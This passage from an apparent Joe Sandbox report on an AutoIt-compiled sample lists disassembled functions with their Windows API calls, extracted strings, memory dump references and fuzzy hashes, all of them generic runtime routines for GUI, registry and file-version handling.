                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 464785882-4108050209
                                                                            • Opcode ID: ce54f4c97d6697eada203c91336a847e137811edf2d0c3b052323e14858cabd4
                                                                            • Instruction ID: 0dc0617fe30bdd5e57613dab1530dcccb9d50c7f4480dd403090c94d03590248
                                                                            • Opcode Fuzzy Hash: ce54f4c97d6697eada203c91336a847e137811edf2d0c3b052323e14858cabd4
                                                                            • Instruction Fuzzy Hash: E5129E74204201DFDB26CF28C884BA9BBF5FF49314F5585A9E989CB652C735EC82CB91
                                                                            Function 0034DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034DBD6
                                                                            • GetDriveTypeW.KERNEL32(?,0039DC54,?,\\.\,0039DC00), ref: 0034DCC3
                                                                            • SetErrorMode.KERNEL32(00000000,0039DC54,?,\\.\,0039DC00), ref: 0034DE29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: dd0805fe00b118e0237e1c7ae89f595a9df52d7bea96c8d538e7303a8175adae
                                                                            • Instruction ID: 16e9369d6b01ee94c4b1fed88b551412f3b41bdcee26c455893652ad72c35560
                                                                            • Opcode Fuzzy Hash: dd0805fe00b118e0237e1c7ae89f595a9df52d7bea96c8d538e7303a8175adae
                                                                            • Instruction Fuzzy Hash: B9519D30648312EBC607DF10C8A28A9B7E4FF96708B20591EF1479FAD5DA70F945DB42
                                                                            Function 0030CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-86951937
                                                                            • Opcode ID: 70a76963565b7df3ffb595c215b2275dc724de3a8478e91489309927743b8a7e
                                                                            • Instruction ID: 533c727e303f79bbd993daa919528758b450c41b6e7df12009e9cb160b73ada8
                                                                            • Opcode Fuzzy Hash: 70a76963565b7df3ffb595c215b2275dc724de3a8478e91489309927743b8a7e
                                                                            • Instruction Fuzzy Hash: 25814770641215BBDB37AB64DDA3FFF3768AF24300F055128F909AE5C6EB60DA41C2A0
                                                                            Function 0036C6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0036C788
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0036C83E
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0036C859
                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0036CB15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: b37f0996451e5a4969c5d4ad5f66fff694c71971d0b54261d4f3d65fec3837d7
                                                                            • Instruction ID: fc9904e8aaffd5db94a82563d3b52b600b4b69c5498ccb6d26019e48cb2e3d3b
                                                                            • Opcode Fuzzy Hash: b37f0996451e5a4969c5d4ad5f66fff694c71971d0b54261d4f3d65fec3837d7
                                                                            • Instruction Fuzzy Hash: 62F1CF71214301AFD7228F24C889BBABBE8FF49314F08962DF5D9972A5C774D841DB92
                                                                            Function 0036638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,0039DC00), ref: 00366449
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 3964851224-45149045
                                                                            • Opcode ID: fe6dd81b316728343f9e3a64bfb13ce773ec77c59ee661b9382a3e22aebeed0c
                                                                            • Instruction ID: 601c4ed263a349909a04d31a060bcf5943be6f75eb8e61a17063765ae8dcb110
                                                                            • Opcode Fuzzy Hash: fe6dd81b316728343f9e3a64bfb13ce773ec77c59ee661b9382a3e22aebeed0c
                                                                            • Instruction Fuzzy Hash: E4C1C6342043428BCB07EF10C552AAE7795AF99384F008858F9965F6E7DF31ED8ACB85
                                                                            Function 0036D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 0036D5AE
                                                                            • SetTextColor.GDI32(?,?), ref: 0036D5B2
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0036D5C8
                                                                            • GetSysColor.USER32(0000000F), ref: 0036D5D3
                                                                            • CreateSolidBrush.GDI32(?), ref: 0036D5D8
                                                                            • GetSysColor.USER32(00000011), ref: 0036D5F0
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0036D5FE
                                                                            • SelectObject.GDI32(?,00000000), ref: 0036D60F
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0036D618
                                                                            • SelectObject.GDI32(?,?), ref: 0036D625
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0036D644
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0036D65B
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0036D670
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0036D698
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0036D6BF
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0036D6DD
                                                                            • DrawFocusRect.USER32(?,?), ref: 0036D6E8
                                                                            • GetSysColor.USER32(00000011), ref: 0036D6F6
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0036D6FE
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0036D712
                                                                            • SelectObject.GDI32(?,0036D2A5), ref: 0036D729
                                                                            • DeleteObject.GDI32(?), ref: 0036D734
                                                                            • SelectObject.GDI32(?,?), ref: 0036D73A
                                                                            • DeleteObject.GDI32(?), ref: 0036D73F
                                                                            • SetTextColor.GDI32(?,?), ref: 0036D745
                                                                            • SetBkColor.GDI32(?,?), ref: 0036D74F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: 83372d842412a58990c9c22010110023fb64f81060dcf30c84126bf53a6db42e
                                                                            • Instruction ID: 7542f2bbea0fe3b3d9857a31734fce96b25f2b92b0b07d269cd128d016e188c5
                                                                            • Opcode Fuzzy Hash: 83372d842412a58990c9c22010110023fb64f81060dcf30c84126bf53a6db42e
                                                                            • Instruction Fuzzy Hash: FB514B71900208AFDF12AFA8DC48EAE7BB9FF49320F114155FA15AB2E1D7759A40DF50
                                                                            Function 0036B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0036B7B0
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0036B7C1
                                                                            • CharNextW.USER32(0000014E), ref: 0036B7F0
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0036B831
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0036B847
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0036B858
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0036B875
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0036B8C7
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0036B8DD
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0036B90E
                                                                            • _memset.LIBCMT ref: 0036B933
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0036B97C
                                                                            • _memset.LIBCMT ref: 0036B9DB
                                                                            • SendMessageW.USER32 ref: 0036BA05
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0036BA5D
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0036BB0A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0036BB2C
                                                                            • GetMenuItemInfoW.USER32(?), ref: 0036BB76
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0036BBA3
                                                                            • DrawMenuBar.USER32(?), ref: 0036BBB2
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0036BBDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
                                                                            • Opcode ID: e4b40dd571f5bf6f82a1348aedce6045ecc29e50d81f7c2c6a972d388c0e66a4
                                                                            • Instruction ID: 45f68c52a2a00c43e2bb9891ac448f8f41fb5ea3a9899c5f1f4ab1e6c1415037
                                                                            • Opcode Fuzzy Hash: e4b40dd571f5bf6f82a1348aedce6045ecc29e50d81f7c2c6a972d388c0e66a4
                                                                            • Instruction Fuzzy Hash: 66E17C71900218ABDB229FA5CC84EEEBBBCEF05714F10C156F919EB295D7708A81DF60
                                                                            Function 00302EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Foreground
                                                                            • String ID: ACTIVE$ALL$CLASS$H+;$HANDLE$INSTANCE$L+;$LAST$P+;$REGEXPCLASS$REGEXPTITLE$T+;$TITLE
                                                                            • API String ID: 62970417-2354770990
                                                                            • Opcode ID: 1a2a092dfd7f21060de9d2445ef36de29b6d2f9e36bd4fd539f89cc2bef6c78e
                                                                            • Instruction ID: c137734abb51ed339f2d97da06a7ec52f0dd7bc007df2cf478d0166dbac69a42
                                                                            • Opcode Fuzzy Hash: 1a2a092dfd7f21060de9d2445ef36de29b6d2f9e36bd4fd539f89cc2bef6c78e
                                                                            • Instruction Fuzzy Hash: 7AD1C8305083439BCB17EF20C891A9BBBB4FF58344F108A1DF4595B5A2DB34E99ACB91
                                                                            Function 0036764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 0036778A
                                                                            • GetDesktopWindow.USER32 ref: 0036779F
                                                                            • GetWindowRect.USER32(00000000), ref: 003677A6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00367808
                                                                            • DestroyWindow.USER32(?), ref: 00367834
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0036785D
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0036787B
                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003678A1
                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 003678B6
                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003678C9
                                                                            • IsWindowVisible.USER32(?), ref: 003678E9
                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00367904
                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00367918
                                                                            • GetWindowRect.USER32(?,?), ref: 00367930
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00367956
                                                                            • GetMonitorInfoW.USER32 ref: 00367970
                                                                            • CopyRect.USER32(?,?), ref: 00367987
                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 003679F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: 37c9679c7c6e7dae571d6b7ff9d7ede0fa43a9826482c632998da27bee739b54
                                                                            • Instruction ID: 6eeb31798f4d62822dd886be32a95607a31fef4a6318ac1fcba59d53f14d39a9
                                                                            • Opcode Fuzzy Hash: 37c9679c7c6e7dae571d6b7ff9d7ede0fa43a9826482c632998da27bee739b54
                                                                            • Instruction Fuzzy Hash: 9CB1A071608301AFDB05DF64C949B6ABBE9FF88314F40891DF5999B291DB70EC04CB92
                                                                            Function 00346CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00346CFB
                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00346D21
                                                                            • _wcscpy.LIBCMT ref: 00346D4F
                                                                            • _wcscmp.LIBCMT ref: 00346D5A
                                                                            • _wcscat.LIBCMT ref: 00346D70
                                                                            • _wcsstr.LIBCMT ref: 00346D7B
                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00346D97
                                                                            • _wcscat.LIBCMT ref: 00346DE0
                                                                            • _wcscat.LIBCMT ref: 00346DE7
                                                                            • _wcsncpy.LIBCMT ref: 00346E12
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 699586101-1459072770
                                                                            • Opcode ID: 035185099baeaccc692062d995e73254fa43683bbe6706cbf141971c163ff016
                                                                            • Instruction ID: d471af82d91c2ffbfbcb4c505891162c9304fbe6fb68bed23b36b1b166de596c
                                                                            • Opcode Fuzzy Hash: 035185099baeaccc692062d995e73254fa43683bbe6706cbf141971c163ff016
                                                                            • Instruction Fuzzy Hash: 8B41E971A04210BBEB07AF64DD47EFF77BCEF46710F140055F901AE182EB74AA4596A2
                                                                            Function 0031A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0031A939
                                                                            • GetSystemMetrics.USER32(00000007), ref: 0031A941
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0031A96C
                                                                            • GetSystemMetrics.USER32(00000008), ref: 0031A974
                                                                            • GetSystemMetrics.USER32(00000004), ref: 0031A999
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0031A9B6
                                                                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0031A9C6
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0031A9F9
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0031AA0D
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 0031AA2B
                                                                            • GetStockObject.GDI32(00000011), ref: 0031AA47
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0031AA52
                                                                              • Part of subcall function 0031B63C: GetCursorPos.USER32(000000FF), ref: 0031B64F
                                                                              • Part of subcall function 0031B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0031B66C
                                                                              • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000001), ref: 0031B691
                                                                              • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000002), ref: 0031B69F
                                                                            • SetTimer.USER32(00000000,00000000,00000028,0031AB87), ref: 0031AA79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: cfd38c36059434e4e7d285210678d0bc31e240d5ab6b5829367d240140b87121
                                                                            • Instruction ID: 57edd073e647e1414b39d0eb5c6ce7d42a2ad885e743e2aacd685ba9bed90018
                                                                            • Opcode Fuzzy Hash: cfd38c36059434e4e7d285210678d0bc31e240d5ab6b5829367d240140b87121
                                                                            • Instruction Fuzzy Hash: 3CB16A71A0020A9FDB1ADFA8DC45BEE7BB8FF09315F114219FA15E6290DB74A890CB51
                                                                            Function 00363639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00363735
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0039DC00,00000000,?,00000000,?,?), ref: 003637A3
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003637EB
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00363874
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00363B94
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00363BA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: cda8db815ffbe6f7ccd64865aa8134ce438d546f7de647e6aaddda08b64b7dec
                                                                            • Instruction ID: ba0ad0f8ab1641ea96c9b69563def57f337849fad13db838d0e969601b0eaadf
                                                                            • Opcode Fuzzy Hash: cda8db815ffbe6f7ccd64865aa8134ce438d546f7de647e6aaddda08b64b7dec
                                                                            • Instruction Fuzzy Hash: AC026C756046019FCB16EF14C895A6AB7E9FF88720F05845DF98A9B3A2CB30ED41CF85
                                                                            Function 00366BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 00366C56
                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00366D16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
